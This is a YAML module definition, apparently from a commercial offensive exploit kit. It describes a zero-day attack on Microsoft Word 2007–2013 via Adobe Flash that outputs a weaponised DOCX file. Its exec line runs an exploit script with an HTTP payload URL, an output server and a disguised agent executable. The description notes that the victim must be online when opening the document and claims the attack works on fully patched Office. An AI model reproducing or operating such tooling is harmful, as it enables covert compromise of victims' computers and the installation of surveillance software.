version: 20140930
id: HT-2013-002
name: Microsoft Word 2007/2010/2013 + Adobe Flash
category: :zeroday
format:
- docx
platform: windows
multiserver: true
exploit_server: true
exec: python exploit.py payload:http %URL% "%OUTPUT%" "%FILE%" "%FILENAME%" %AGENT% "%OUTPUT_SERVER%" %SCOUT_NAME%.exe
params:
  file: Document
  string: URL
description: "<br><b>Output:</b> DOCX file<br><br><b>Note:</b> The target must be connected to the internet when opening the document. <br><br><b>Platform:</b> Windows<br><br><b>Tested on:</b><br>Windows XP/Vista/7<br>Microsoft Office 2007/2010/2013 (full patched) - <b>Require Adobe Flash v11.1.102.55 or above for Internet Explorer</b>"

